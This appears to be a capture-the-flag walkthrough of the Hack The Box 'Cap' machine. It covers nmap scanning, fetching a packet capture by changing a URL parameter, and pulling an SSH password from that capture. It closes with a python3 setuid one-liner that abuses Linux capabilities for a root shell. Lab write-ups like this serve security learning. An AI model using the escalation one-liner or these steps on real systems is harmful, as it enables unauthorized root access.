Today we come with another challenge from Hackthebox called cap . This is easy level machine in which non encrypted traffic was going on and using Wireshark we analyze the traffic .So without wasting time let start the machine.
Level : Easy
Attacking Strategy
- Network Scanning
- Nmap
- Enumeration
- PCAP dump
- Analyze pcap file
- extract Credentials from pcap file
- Privilege Escalation
- Abusing capabilities
Walkthrough
IP Address : 10.10.10.245
We start with nmap scan with default -sC script and -sV version scanning to perform the banner grabbing on server . Nmap reveals some service and ports are open on target like port 21 FTP , port 22 SSH, Port 80 HTTP.
nmap -sC -sV -p- 10.10.10.245Nmap scan report for 10.10.10.245
Host is up (0.11s latency).
Not shown: 65463 filtered ports, 69 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|_ 256 3f:d0:ff:91:eb:3b:f6:e1:9f:2e:8d:de:b3:de:b2:18 (ED25519)
80/tcp open http gunicorn
| fingerprint-strings:
| FourOhFourRequest:
| HTTP/1.0 404 NOT FOUND
| Server: gunicorn
| Date: Fri, 20 Aug 2021 16:22:54 GMT
| Connection: close
| Content-Type: text/html; charset=utf-8
| Content-Length: 232
| <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
| <title>404 Not Found</title>
| <h1>Not Found</h1>
| <p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
| GetRequest:
| HTTP/1.0 200 OK
| Server: gunicorn
| Date: Fri, 20 Aug 2021 16:22:48 GMT
| Connection: close
| Content-Type: text/html; charset=utf-8
| Content-Length: 19386
| <!DOCTYPE html>
| <html class="no-js" lang="en">
| <head>
| <meta charset="utf-8">
| <meta http-equiv="x-ua-compatible" content="ie=edge">
| <title>Security Dashboard</title>
| <meta name="viewport" content="width=device-width, initial-scale=1">
| <link rel="shortcut icon" type="image/png" href="/static/images/icon/favicon.ico">
| <link rel="stylesheet" href="/static/css/bootstrap.min.css">
| <link rel="stylesheet" href="/static/css/font-awesome.min.css">
| <link rel="stylesheet" href="/static/css/themify-icons.css">
| <link rel="stylesheet" href="/static/css/metisMenu.css">
| <link rel="stylesheet" href="/static/css/owl.carousel.min.css">
| <link rel="stylesheet" href="/static/css/slicknav.min.css">
| <!-- amchar
| HTTPOptions:
| HTTP/1.0 200 OK
| Server: gunicorn
| Date: Fri, 20 Aug 2021 16:22:48 GMT
| Connection: close
| Content-Type: text/html; charset=utf-8
| Allow: OPTIONS, GET, HEAD
| Content-Length: 0
| RTSPRequest:
| HTTP/1.1 400 Bad Request
| Connection: close
| Content-Type: text/html
| Content-Length: 196
| <html>
| <head>
| <title>Bad Request</title>
| </head>
| <body>
| <h1><p>Bad Request</p></h1>
| Invalid HTTP Version 'Invalid HTTP Version: 'RTSP/1.0''
| </body>
|_ </html>
|_http-server-header: gunicornOn port 21 i.e FTP anonymous login is not available and this version is not exploitable directly,then we move on port 80 and start enumeration .After some time we got the information from profile like username “Nathan” , etc.
Enumeration
The landing page have one more functionality for taking the snapshot for analysis .we download the some pcap file for analysis. Now we start enumerating the file and start enumeration about services or any other details. After some time we simply try to get 0.pcap file by changing URL parameter .
0.pcap file have lot of protocols like HTTP, etc . Pcap file is long to understand so we filter the information according the need.After giving sometime we got the credentials. so we simply ssh the service and it worked.
Privilege Escalation
From these credential we ssh to the server. Now its time to get the root, so we start with manual enumeration like checking passwd file , SUID Bit, etc.
Username : nathan
Password : Buck3tH4TF0RM3!
Username and Password from PCAP file
After some time we get to know that we can abuse the capabilities i.e we can use python to abuse, GTFOBins show how to abuse the capabilities . After successful exploitation we got the root and collect the flags .
getcap -r / 2>/dev/null
python3 -c 'import os; os.setuid(0); os.system("/bin/sh")'